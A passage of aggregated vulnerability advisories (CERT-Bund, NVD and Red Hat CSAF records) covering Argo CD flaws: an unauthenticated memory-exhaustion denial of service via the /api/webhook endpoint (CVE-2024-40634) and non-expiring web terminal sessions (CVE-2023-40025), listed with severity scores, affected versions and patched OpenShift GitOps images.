"url": "https://github.com/argoproj/argo-cd"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2024-3002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}
WID-SEC-W-2024-1718
Vulnerability from csaf_certbund - Published: 2024-07-28 22:00 - Updated: 2024-08-01 22:00Es besteht eine Schwachstelle in Red Hat OpenShift GitOps. Diese Fehler betrifft die Argo-CD-Komponente aufgrund einer unsachgemäßen Behandlung großer JSON-Payloads am /api/webhook-Endpunkt, was zu einer übermäßigen Zuweisung von Speicher führt. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.
Es besteht eine Schwachstelle in Red Hat OpenShift GitOps. Diese Fehler betrifft die Argo-CD-Komponente aufgrund einer unsachgemäßen Behandlung großer JSON-Payloads am /api/webhook-Endpunkt, was zu einer übermäßigen Zuweisung von Speicher führt. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1718 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1718.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1718 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1718"
},
{
"category": "external",
"summary": "Red Hat Security Advisory vom 2024-07-28",
"url": "https://access.redhat.com/errata/RHSA-2024:4891"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4972 vom 2024-08-01",
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4973 vom 2024-08-01",
"url": "https://access.redhat.com/errata/RHSA-2024:4973"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift (GitOps): Schwachstelle erm\u00f6glicht Denial of Service",
"tracking": {
"current_release_date": "2024-08-01T22:00:00.000+00:00",
"generator": {
"date": "2024-08-15T18:11:46.557+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2024-1718",
"initial_release_date": "2024-07-28T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-07-28T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-07-29T22:00:00.000+00:00",
"number": "2",
"summary": "Produktversion angepasst"
},
{
"date": "2024-08-01T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"branches": [
{
"category": "product_version_range",
"name": "GitOps \u003c1.13.1",
"product": {
"name": "Red Hat OpenShift GitOps \u003c1.13.1",
"product_id": "T036500"
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40025",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in Red Hat OpenShift GitOps. Diese Fehler betrifft die Argo-CD-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung gro\u00dfer JSON-Payloads am /api/webhook-Endpunkt, was zu einer \u00fcberm\u00e4\u00dfigen Zuweisung von Speicher f\u00fchrt. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen."
}
],
"product_status": {
"known_affected": [
"67646"
]
},
"release_date": "2024-07-28T22:00:00.000+00:00",
"title": "CVE-2023-40025"
},
{
"cve": "CVE-2024-40634",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in Red Hat OpenShift GitOps. Diese Fehler betrifft die Argo-CD-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung gro\u00dfer JSON-Payloads am /api/webhook-Endpunkt, was zu einer \u00fcberm\u00e4\u00dfigen Zuweisung von Speicher f\u00fchrt. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen."
}
],
"product_status": {
"known_affected": [
"67646"
]
},
"release_date": "2024-07-28T22:00:00.000+00:00",
"title": "CVE-2024-40634"
}
]
}
FKIE_CVE-2024-40634
Vulnerability from fkie_nvd - Published: 2024-07-22 18:15 - Updated: 2025-01-09 16:557.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C70E0BA-D4D0-4C05-A0F1-95E13A68BFDB",
"versionEndExcluding": "2.9.20",
"versionStartIncluding": "1.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E18329BB-8F90-4E14-A20B-FF47D16B2D7D",
"versionEndExcluding": "2.10.15",
"versionStartIncluding": "2.10.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E953865-3609-4D15-BD82-8A57A3E2EAB5",
"versionEndExcluding": "2.11.6",
"versionStartIncluding": "2.11.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\n"
},
{
"lang": "es",
"value": "Argo CD es una herramienta declarativa de entrega continua de GitOps para Kubernetes. Este informe detalla una vulnerabilidad de seguridad en Argo CD, donde un atacante no autenticado puede enviar un gran payload JSON especialmente manipulado al endpoint /api/webhook, lo que provoca una asignaci\u00f3n excesiva de memoria que conduce a la interrupci\u00f3n del servicio al desencadenar un Out Of Memory (OOM) kill. El problema plantea un alto riesgo para la disponibilidad de las implementaciones de Argo CD. Esta vulnerabilidad se solucion\u00f3 en 2.11.6, 2.10.15 y 2.9.20."
}
],
"id": "CVE-2024-40634",
"lastModified": "2025-01-09T16:55:20.183",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-07-22T18:15:03.770",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
RHSA-2024_4972
Vulnerability from csaf_redhat - Published: 2024-08-01 10:48 - Updated: 2024-11-24 17:19A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.
A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat\nProduct Security has rated this update as having a security impact of Important.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Errata Advisory for Red Hat OpenShift GitOps v1.11.7.\n\nSecurity Fix(es):\n\n* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)\n* openshift-gitops-container: Argo CD web terminal session doesn\u0027t expire [gitops-1.11](CVE-2023-40025)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4972",
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4972.json"
}
],
"title": "Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security update",
"tracking": {
"current_release_date": "2024-11-24T17:19:33+00:00",
"generator": {
"date": "2024-11-24T17:19:33+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:4972",
"initial_release_date": "2024-08-01T10:48:26+00:00",
"revision_history": [
{
"date": "2024-08-01T10:48:26+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-08-01T10:48:26+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T17:19:33+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.11",
"product": {
"name": "Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.11::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_id": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-operator-bundle\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
